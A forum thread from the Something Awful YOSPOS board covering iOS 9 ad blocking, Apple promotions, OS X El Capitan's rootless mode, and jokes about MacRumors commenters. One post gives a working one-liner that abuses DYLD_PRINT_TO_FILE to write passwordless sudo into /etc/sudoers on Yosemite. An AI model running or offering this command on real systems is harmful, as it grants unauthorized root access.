Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

• Locked thread
kitten emergency
Jan 13, 2008

get meow this wack-ass crystal prison

zen death robot posted:

Does Apple have to approve content blocking extensions for iOS?

looks that way

esp. since they're requiring a full dev account for OS X safari extensions as well - I wonder if they'll distribute them on the Mac App Store?

im not terribly worried that they won't approve them, considering Apple themselves have said they added the content blocking API primarily to allow ad blockers, because they don't think the current methods used are very good

Adbot
ADBOT LOVES YOU

Amethyst
Mar 28, 2004

I CANNOT HELP BUT MAKE THE DCSS THREAD A FETID SWAMP OF UNFUN POSTING
plz notice me trunk-senpai
i use an adblocking dns server hosted on my vps it's cool

kitten emergency
Jan 13, 2008

Amethyst posted:

this is impressively nerdy even for yospos

Amethyst
Mar 28, 2004

uncurable mlady posted:

this is impressively nerdy even for yospos

here's a for dummies guide

http://topchan.info/your-own-adblocking-dns

ads are brain poison, block them while you still can

THE BIG DOG DADDY
Oct 16, 2013

Rasheed was, with Aliases, the top 7 PvPers in Bone Krew.

No one talks about this.
I like ads because they show me things I might want to buy

Amethyst
Mar 28, 2004

Santas Ainol Elf posted:

I like ads because they show me things I might want to buy

tell. they tell you want you want to buy.

Stux
Nov 17, 2006
Probation
Can't post for 3 hours!

Amethyst posted:

i use adblock

Amethyst
Mar 28, 2004

Stux posted:

i use adblock

last time I tried it on ios it didn't work on youtubes

FAT32 SHAMER
Aug 16, 2012

when i used adblock on iOS it doubled my data usage because of the way it processes webpages or something stupid

Stux
Nov 17, 2006
Probation
Can't post for 3 hours!

Amethyst posted:

last time I tried it on ios it didn't work on youtubes

oh i meant on desktop, i dont use anything on ios because lol who uses the browser

PleasureKevin
Jan 2, 2011

Apple today launched its annual Back to School promotion, offering a free pair of Beats Solo2 On-Ear headphones to qualifying students, parents of students and educators that purchase an eligible Mac, including the iMac, MacBook, MacBook Pro, MacBook Air and Mac Pro. As usual, the Mac mini and refurbished Macs are excluded from the deal. iPhones and iPads are also absent from this year's promotion.

Apple's Back to School promotion previously offered a $50 Apple Store gift card with the purchase of an iPhone or iPad in past years, including the 2014 and 2013 promotions, but neither device is eligible for this year's deal.

the headphones are $199.99 USD so this seems like a pretty good deal to me. it also promotes macs to beats fans instead of just apple fans, and vice versa.

Valeyard
Mar 30, 2012

Grimey Drawer
buy our overpriced garbage and we will give you some more overpriced garbage for free

Pinterest Mom
Jun 9, 2009

thanks timb

med school head
Apr 17, 2012
i adblock everything and dgaf

The Management
Jan 2, 2010

sup, bitch?

Stux posted:

oh i meant on desktop, i dont use anything on ios because lol who uses the browser

Celexi
Nov 25, 2006
Probation
Can't post for 3 hours!
do u want root on the new osx??

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

pram
Jun 10, 2001
does El Capitan not have the admin group in sudoers

Celexi
Nov 25, 2006
Probation
Can't post for 3 hours!
el capitan is rootless

graph
Nov 22, 2006

aaag peanuts

Celexi posted:

do u want root on the new osx??

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

omg lol

pram
Jun 10, 2001

Celexi posted:

el capitan is rootless

this doesnt sound bad actually. kind of like overlayroot

http://pointlessramblings.com/posts/El_Capitan/

ZShakespeare
Jul 20, 2003

The devil can cite Scripture for his purpose!
how is the ios9 public beta? that adblocking feature sounds hot as hell (but I don't want my phone to be).

Soldier of Fortran
May 2, 2009

ZShakespeare posted:

how is the ios9 public beta? that adblocking feature sounds hot as hell (but I don't want my phone to be).
it's nice. adblockers can't be in the app store until release time btw.

don't install a beta on your phone though. your ipad sure, but not your phone.

kitten emergency
Jan 13, 2008

graph posted:

omg lol

it actually doesn't work on el cap, but it affects Yosemite

cremnob
Jun 30, 2010

triple sulk
Sep 17, 2014

rootless mode in el capitan is a real loving nuisance right now. like i get it's great for regular users but for developers it's a huge pain in the rear end.

Linguica
Jul 13, 2000
You're already dead

triple sulk posted:

rootless mode in el capitan is a real loving nuisance right now. like i get it's great for regular users but for developers it's a huge pain in the rear end.
crappled again

Asymmetric POSTer
Aug 17, 2005

oops

The Management
Jan 2, 2010

sup, bitch?
why would it be a problem for developers? why would a developer need to touch the system files?

Sue
Apr 1, 2008

Unix wizards like having write access to their usr/bin.

Endless Mike
Aug 13, 2003

maybe thye should put their crippling autism in the bin

cremnob
Jun 30, 2010

macrumors comment thats upvoted lol

quote:

Who is this targeted to? Who is to be impressed by this campaign? That is, who is gullible enough to see this and be convinced of its message? What reaction could this muster other than outright laughter?

Apple's new design language can be summed up by comparing it to dressing a perfectly grilled Nathan's frankfurter with ketchup. Think about it.

It's regrettable that Jony Ive holds any sway over design. The mere fact that he is in any way responsible in conspiring any facet of design means Apple will have one less sale: Me. And if he keeps up with the magical shrinking iPhone he'll further drive people away from iPhones to something far superior like Samsung phones with 3 gigs of RAM, an Exynos 7420 octa-core, and a massive battery, all in a light-as-a-feather glass and metal body.

Just what the hell has Ive done recently? The design set by iOS 7 can only be described as a design holocaust. The flattening of UI elements into generic and unadorned shapes and the reliance on vivid Fisher Price colors is the mark of a design apostate. The trick to great UI design? Ornament that sucker into oblivion. Or rather obviousness. I write all of this with care and concern for a company I greatly admire but have doubts about when I see Microsoft, Google, and Samsung simply outshining and outclassing Apple in nearly every front. By having Jony Ive as the arbiter of taste at Apple we can be assured that iPhones will continue to embody the thinner-at-the-cost-of-battery-life design for many years to come. Not to mention the complete**** that is the Apple Watch. When you consider the new Macbook and Apple Music, this new Apple has confirmed what analysts and tech pundits have known all along: at the new Apple, there could be nothing new nor clever under the sun. The design sensibilities fostered under the Jobs regime has not endured well at Tim Cook's Apple.

All Apple had to do was outfit the MacBook Air with a Retina display and what did they give us instead? A wholly new architected piece of machinery that is about as feature complete as an iPad. Whoever asked for such a contraption? Not me. Not anyone I know. As for the iPhone, I can't believe what they've done with it. Thinness is not a feature. A phone's thinness has no direct correlation to the ease of one-handed use. All Ive and his team had to do was take the iPhone 4 and stick in a five-inch display and call it a day.

I tell you my brothers and sisters the Apple orchard is quickly becoming the Mobro 4000, doomed to drift endlessly in the economic sea as a mass of garbage that no one wants. The thinner they make the iPhone the more they are making me want to take a pilgrimage to a grander place of Androids and superior Korean design ingenuity.

Apple needs a savior more than ever to save it from the imminent and unavoidable disaster. Nothing quite like iPhone, indeed.

computer parts
Nov 18, 2010

PLEASE CLAP
i didn't know stymie went to macrumors

cremnob
Jun 30, 2010

i really want to understand the pathology of the macrumors commenters. how did they get that way? they're clearly "apple fans" but they p. much post like trolls and apple haters (and they've been registered on the site for years so they arent actual trolls)

macdailynews is where the rush limbaugh apple fans congregate but thats also cause whoever runs macdailynews is also a rush limbaugh conservative

Pinterest Mom
Jun 9, 2009

he's just really mad that the performa line got killed off

Pinterest Mom
Jun 9, 2009

the apple fandom equivalent of someone still pining for a firefly reunion

Lacedaemonius
Jan 18, 2015

Rub a dub dub

cremnob posted:

i really want to understand the pathology of the macrumors commenters. how did they get that way? they're clearly "apple fans" but they p. much post like trolls and apple haters (and they've been registered on the site for years so they arent actual trolls)

macdailynews is where the rush limbaugh apple fans congregate but thats also cause whoever runs macdailynews is also a rush limbaugh conservative

It's like hipsters trying to stand out in a crowd of hipsters. In their perfect world everyone would be working on the Lisa.

Stux
Nov 17, 2006
Probation
Can't post for 3 hours!
why do people like those ugly super glossy stupid old icons more than the new ones on ios etc i dont get it. they looked awful.

Sue
Apr 1, 2008

Top Ten UIs that don't look like poo poo:

1. Metro
2. Mac OS 9

pram
Jun 10, 2001

Sue posted:

Top Ten UIs that don't look like poo poo:

1. Metro
2. Mac OS 9

jesus gently caress get out

Adbot
ADBOT LOVES YOU

ZShakespeare
Jul 20, 2003

The devil can cite Scripture for his purpose!
I like the way metro looks but the implementation is unusable garbage.

• Locked thread